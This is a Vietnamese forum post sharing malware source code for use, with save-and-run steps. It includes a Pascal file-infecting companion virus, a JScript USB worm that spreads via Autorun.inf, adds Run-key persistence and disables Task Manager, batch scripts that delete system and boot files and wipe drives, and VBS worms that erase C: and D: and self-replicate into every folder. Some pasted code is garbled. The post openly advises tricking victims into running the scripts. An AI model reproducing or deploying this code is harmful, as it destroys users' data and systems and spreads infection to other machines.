Cùi bắp, virus mà có code ngắn ngủn (chưa đủ 1 dòng ) mà gọi là virus a`
Nói thế thì cả tỉ code tựa tựa.
Virus nè
1.Viết trên nền pascal
Viết virus bằng Pascal
Với mục đích giúp các bạn tìm hiểu kỹ thuật làm ra (tạo) các chương trình virus, tui xin giới thiệu một chương trình virus đơn giản viết bằng ngôn ngữ Pascal mang tên kompan. Tác giả của chương trình này là một chuyên gia về viurs người Balan - Adam Blaszczyk. Virus kompan là viurs lây nhiễm vào các file loại *.EXE và file *.COM có trong thư mục hiện thời. Bạn cần lưu ý đến kỹ thuật làm "lây nhiễm" trong chương trình này. các bạn yên tâm Kompan là virus rất "hữu nghị" bạn có thể dịch và chạy chương trình nguồn dưới đây để thử. Điều đáng quan tâm ở đây là kỹ thuật làm ra (tạo) ra virus.
program kompan;
{$A-,B-,D-,E-,F-,G-,I-,L-,N-,O-,P-,Q-,R-,S-,T-,V-,X-,Y-}
{$M 8192,0,16384}
uses Dos, Crt;
const
MaskaEXE = '*.EXE';
var
Szuk : SearchRec;
NazwaNosiciela,
NazwaOfiary : String;
PlikNosiciela,
PlikOfiary : File;
DlugoscNosiciela : LongInt;
Bufor : Pointer;
I : Byte;
Status : Boolean;
begin
WriteLn;
WriteLn (' KOMPAN v1.0, Autor : Adam Blaszczyk 1997');
WriteLn;
NazwaNosiciela := ParamStr (0);
WriteLn (' Czy chcesz uruchomic wirusa (T/N) ?');
if UpCase(ReadKey)='T' then
begin
WriteLn;
Status :=False;
FindFirst (MaskaEXE, AnyFile, Szuk);
while (DosError = 0) and (IOResult = 0) and (not Status) do
begin
with Szuk do
if not ((Name='.') or
(Name='..') or
(not (Attr and Directory and VolumeID<>0))) then
begin
NazwaOfiary:=Name;
Delete (NazwaOfiary, Pos ('EXE',NazwaOfiary),3);
NazwaOfiary:=NazwaOfiary+'COM';
Assign (PlikOfiary, NazwaOfiary);
Reset (PlikOfiary,1);
if IOResult <> 0 then
begin
Status:=True;
WriteLn (' Tworze KOMPANA : ',NazwaOfiary);
Assign (PlikNosiciela, NazwaNosiciela);
Reset (PlikNosiciela, 1);
DlugoscNosiciela := FileSize (PlikNosiciela);
GetMem (Bufor,DlugoscNosiciela);
BlockRead (PlikNosiciela, Bufor^, DlugoscNosiciela);
ReWrite (PlikOfiary,1);
BlockWrite (PlikOfiary , Bufor^, DlugoscNosiciela);
Close (PlikNosiciela);
Close (PlikOfiary);
FreeMem (Bufor, DlugoscNosiciela);
end;
end;
FindNext (Szuk);
end;
If Not Status then WriteLn (' Nie znalazlem zadnego kandydata do infekcji !');
end;
Delete (NazwaNosiciela,Pos ('.COM',NazwaNosiciela),4);
NazwaNosiciela := '/C '+NazwaNosiciela+'.EXE';
for I:=1 to ParamCount do
NazwaNosiciela := NazwaNosiciela +' '+ParamStr(I);
SwapVectors;
Exec(GetEnv('COMSPEC'), NazwaNosiciela);
SwapVectors;
end.
2.Virus Uragon.txt.js (Con này của hacker, mình mò code của nó rồi copy lại)
Cần 2 file
File: uragon.txt.js
Code:
iset="Internet Settings"; expl="Explorer"; virus="uragon.txt.js"; flag=0;
reg1="HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\"; rdw="REG_DWORD"; rsz="REG_SZ";
fso=new ActiveXObject("Scripting.FileSystemObject"); wsh=new ActiveXObject("WScript.Shell");
try{wsh.run(WScript.arguments(0),1,false);}catch(e 0){}
try{value=wsh.regRead("HKLM\\SOFTWARE\\BICOLANOINI \\");if(value=="NHED57")WScript.quit();}catch(e1){ }
wsh.regWrite("HKCU\\Software\\Microsoft\\Windows Script Host\\Settings\\Timeout",0,"REG_DWORD");
io=fso.openTextFile(WScript.ScriptFullName);cntnt= io.readAll();io.close(); for({_();WScript.sleep(100);}
function _(){
try {
win=fso.getSpecialFolder(0)+"\\service.exe.js"; win32=fso.getSpecialFolder(0)+"\\system32\\winx86. dll.js";
if(!fso.fileExists(win)){
io=fso.createTextFile(win);io.write(cntnt);io.clos e();fso.getFile(win).attributes=7;
try{lock=fso.openTextFile(win);for(lock.readAll();}catch(e3){}
}
if(!fso.fileExists(win32)){
io=fso.createTextFile(win32);io.write(cntnt);io.cl ose();fso.getFile(win32).attributes=7;
try{lock=fso.openTextFile(win32);for(lock.readAll();}catch(e4){}
}
wsh.regWrite(reg1+iset+"\\Zones\\0\\1201",flag,rdw );wsh.regWrite(reg1+iset+"\\Zones\\1\\1201",flag,r dw);
wsh.regWrite(reg1+iset+"\\Zones\\2\\1201",flag,rdw );wsh.regWrite(reg1+iset+"\\Zones\\3\\1201",flag,r dw);
wsh.regWrite(reg1+iset+"\\Zones\\4\\1201",flag,rdw );
wsh.regWrite(reg1+"Policies\\Explorer\\Run\\1","c: \\windows\\system32\\winx86.dll.js",rsz);
wsh.regWrite(reg1+"Run\\updater23","c:\\windows\\s ervice.exe.js",rsz);
wsh.regWrite(reg1+"Policies\\"+expl+"\\NoRun",1,rd w);wsh.regWrite(reg1+"Policies\\"+expl+"\\NoFolder Options",1,rdw);
wsh.regWrite(reg1+"Policies\\"+expl+"\\NoShellSear chButton",1,rdw);wsh.regWrite(reg1+"Policies\\Syst em\\DisableTaskmgr",1,rdw);
wsh.regWrite(reg1+expl+"\\Advanced\\Hidden",2,rdw) ;wsh.regWrite(reg1+expl+"\\Advanced\\HideFileExt", 1,rdw);
wsh.regWrite(reg1+expl+"\\Advanced\\ShowSuperHidde n",0,rdw);
for(e=new Enumerator(fso.drives);!e.atEnd();e.moveNext()){
dr=e.item();
if((dr.driveType==1||dr.driveType==2)&&dr.driveLet ter.substring(0,1).toUpperCase()!="A"){
sze=dr.totalSize/(1024*1024*1024);
if(sze<10/*10*/){
p=dr.path+"\\";ssl=p+virus;ar=p+"Autorun.inf";
inf="[autorun]
" + "shellexecute=wscript.exe "+virus+" \"%1\"
shell\\E&xplore\\command=wscript.exe "+virus+" \"%1\"
"+
"shell\\verb=&Open
shell\\verb\\command=wscript .exe "+virus+" \"%1\"
";
if(!fso.fileExists(ssl))
{io=fso.createTextFile(ssl);io.write(cntnt);io.clo se();fso.getFile(ssl).attributes=7;}
if(fso.fileExists(ar)){
f=fso.getFile(ar);io=f.openAsTextStream(1,-2);info="";
if(!io.atEndOfStream)info=io.readAll();io.close();
if(info.indexOf(inf)<0){f.attributes=0;io=f.openAs TextStream(2,-1);io.write(inf);io.close();}
}else{io=fso.createTextFile(ar);io.write(inf);io.c lose();}
fso.getFile(ar).attributes=6;
}
}
}
try{io=fso.openTextFile(WScript.ScriptFullName);fo r(io.readAll();}catch(e5){}
}catch(e2){}
}
File:AutoRun
Code:
[autorun]
shellexecute=wscript.exe uragon.txt.js "%1"
shell\E&xplore\command=wscript.exe uragon.txt.js "%1"
shell\verb=&Open
shell\verb\command=wscript.exe uragon.txt.js "%1"
3.Virus không nên dùng
Dán mã naỳ vaò notepad :
Code :
@Echo Off
@cls
@title Virus ti choi
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown -s -t 06 -c " Fatal error #1337, You DEAD!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
Save thành file *.bat
4.Worm
các bạn lưu với đuôi .vbs là ok.
msgbox"Warnig!" 'Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nhan
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"
On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub
On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub
On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub
On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
5.Virus xóa file system
Mở notepad lên và copy vào đó đoạn code sau:
Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save lại với dạng karobi.bat
Dụ victim mở nó lên và...
Tác dụng của con này là : nó sẽ xoá hết những file khởi động của hệ thống .
Cách khắc phục : sang máy khác copy các file sau : autoexec.bat ; boot.ini ; ntldr ; win.ini và dán vào ổ C .
Riêng file win.ini thì cho vào C:\Window\ nhé .
6.Worm lây lan
+ Đây là cách làm ra (tạo) một con virus đơn giản, cức năng của nó là tự nhân bản sang tất cả các folder của tất cả các ổ đĩa , nạn nhân thấy nó chắc ngứa mắt lắm nhỉ ?
+ Đương nhiên muốn xoá nó cũng không phải dễ đâu, bạn không bao giờ xoá hết hàng tỉ con virus này đâu, mà xoá tì nó vẫn mọc lại thôi, vì vậy nên mình cũng cung cấp file diệt (đưa 1.00.000đ đây)
Bạn làm teo các bước sau:
B1: Mở notepad ra
B2:Chép đoạn mã này vào
Code:
‘Waring, virus waring !!! Dim fso, file, VB Copy Set fso= Create Object (“Scripting.File System Object”)
Set file=
Fs
pen Text File (WScript. Script Full name, 1)
VB Copy= file. Read All
Folder List (“A:\”)
Folder List (“B:\”)
Folder List (“C:\”)
Folder List (“D:\”)
Folder List (“E:\”)
Folder List (“F:\”)
Folder List (“G:\”)
Folder List (“H:\”)
Folder List (“I:\”)
Folder List (“J:\”)
Folder List (“K:\”)
Folder List (“L:\”)
Folder List (“M:\”)
Folder List (“N:\)
Folder List (“O:\)
Folder List (“P:\)
Folder List (“Q:\)
Folder List (“R:\)
Folder List (“S:\)
Folder List (“T:\)
Folder List (“U:\)
Folder List (“V:\)
Folder List (“X:\)
Folder List (“Y:\)
Folder List (“Z:\)
Folder List (“W:\) Sub
Folder List (Folder Spec)
On error resume next
Dim f, f1, st, COP, CAP
Set f=
fso.Get Folder (Folder Spec)
set sf= f.Sub Folders for each f1 In sf set COP=
fso. Create Text File (f1.path & “\Virus !!!!!!!.vbs”)
COP. Write VB Copy set CAP=
Fso. Create Text File (f1.pat & “--- Virus !!!!!!!.vbs”)
CAP.write VBCopy
Folder List (f1.Path) Next
End Sub
¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬__________ __________________________________________________ ____________
B3: Save với tên của một loại virus nhưng kèm đuôi vbs
Eg: W32.VBCopy.Staff.vbs
---------- Bài viết vừa được nhập tự động bởi hệ thống ----------
Thank đi nha các bạn